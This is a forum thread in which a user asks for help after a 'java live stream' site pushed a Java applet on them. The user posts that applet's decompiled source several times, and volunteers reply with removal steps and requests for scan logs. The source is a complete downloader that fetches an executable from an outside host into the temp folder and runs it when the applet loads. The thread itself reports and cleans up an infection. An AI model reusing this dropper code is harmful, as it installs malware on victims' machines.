java virus

[Oxide]

1.My issues are:
I downloaded it nothing has happened as of yet and from the java live stream

http://livestream-vids.com/1itemdbow

It makes you use a java file which i decompiled

import java.applet.Applet;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.net.URL;

public class Livestream extends Applet
{
  public static void startupAll()
  {
    try
    {
      String str1 = System.getenv("TMP");
      String str2 = "\\privzate.exe";
      String str3 = str1.concat(str2);
      URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
      BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURL.openStream());
      FileOutputStream localFileOutputStream = new FileOutputStream(str3);
      BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
      byte[] arrayOfByte = new byte[1024];
      int i = 0;
      while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) >= 0) {
        localBufferedOutputStream.write(arrayOfByte, 0, i);
      }
      localBufferedOutputStream.close(); localBufferedInputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      Process localProcess = localRuntime.exec(str3); } catch (Exception localException) {
    }
  }

  public void init() {
    startupAll();
  }
  public void main(String[] paramArrayOfString) {
    startupAll();
  }
}

Pritty sure that is a virus

URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");

Especially when i went on ripaustin.org and it had a register thing to make an account and it was a bot panel

2.My MBAM log:

3.My OTL log:
OTL
http://tinypaste.com/c45dad

EXTRAS

http://tinypaste.com/c1d33e
4.My GMER log:

http://tinypaste.com/e5403a

Issues encountered:

NONE YET!

 

[Oxide]

Well, I did some sneaky detective work and decompiled the java file

import java.applet.Applet;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.net.URL;

public class Livestream extends Applet
{
  public static void startupAll()
  {
    try
    {
      String str1 = System.getenv("TMP");
      String str2 = "\\privzate.exe";
      String str3 = str1.concat(str2);
      URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
      BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURL.openStream());
      FileOutputStream localFileOutputStream = new FileOutputStream(str3);
      BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
      byte[] arrayOfByte = new byte[1024];
      int i = 0;
      while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) >= 0) {
        localBufferedOutputStream.write(arrayOfByte, 0, i);
      }
      localBufferedOutputStream.close(); localBufferedInputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      Process localProcess = localRuntime.exec(str3); } catch (Exception localException) {
    }
  }

  public void init() {
    startupAll();
  }
  public void main(String[] paramArrayOfString) {
    startupAll();
  }
}

and from what i see when i registered a username on ripaustin it is a bot managing site andi've been added to it I believe!

Posting a hijack log now

 

[Oxide]

1.My issues are:
I downloaded it nothing has happened as of yet and from the java live stream

http://livestream-vids.com/1itemdbow

It makes you use a java file which i decompiled

import java.applet.Applet;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.net.URL;

public class Livestream extends Applet
{
  public static void startupAll()
  {
    try
    {
      String str1 = System.getenv("TMP");
      String str2 = "\\privzate.exe";
      String str3 = str1.concat(str2);
      URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
      BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURL.openStream());
      FileOutputStream localFileOutputStream = new FileOutputStream(str3);
      BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
      byte[] arrayOfByte = new byte[1024];
      int i = 0;
      while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) >= 0) {
        localBufferedOutputStream.write(arrayOfByte, 0, i);
      }
      localBufferedOutputStream.close(); localBufferedInputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      Process localProcess = localRuntime.exec(str3); } catch (Exception localException) {
    }
  }

  public void init() {
    startupAll();
  }
  public void main(String[] paramArrayOfString) {
    startupAll();
  }
}

Pritty sure that is a virus

URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");

Especially when i went on ripaustin.org and it had a register thing to make an account and it was a bot panel

2.My MBAM log:

3.My OTL log:
OTL
http://tinypaste.com/c45dad

EXTRAS

http://tinypaste.com/c1d33e
4.My GMER log:

http://tinypaste.com/e5403a

Issues encountered:

NONE YET!

 

[Oxide]

I did manage to trace it to %Temp%

and found one file there and delted that, still running another MBAM log and a bitdefender scan aswell atm.

 

[Oxide]

That's why i've posted all of this here

 

[Bmthrules]

Go to start up, look for local.exe, delete it.
Restart your computer.
Look in startup, if it's still there give me your mbam log.

Also open up your regedit and remove.

"C:\Users\Chris\AppData\Roaming\local.exe" = C:\Users\Chris\AppData\Roaming\local.exe:*:Enabled:Windows Messanger -- ()
"C:\Users\Chris\AppData\Roaming\local.exe" = C:\Users\Chris\AppData\Roaming\local.exe:*:Enabled:Windows Messanger -- ()

It will be in /authorized/


EDIT: If you are not on the team, do not post in check ups.

 

[Oxide]

Alright, I got this sorted out, Thanks.

 

[Dykerosoft]

Be absolutely sure, because it could still be there.

 

[Oxide]

I sorted this out with paradoxum soon after.

 

[Tha Sneak]

Sorry for the delay, but would you like me to take one last look to be sure it is gone?

 

[Oxide]

Sure, it can't hurt, I had Paradoxum on HF have a look over it aswell.

But a second opinion would be greatly accepted.

 

[Bmthrules]

Are you all deaf? Stop posting in this thread unless you are A. On the team or B. OP

 

[Tha Sneak]

Please post a fresh OTL log.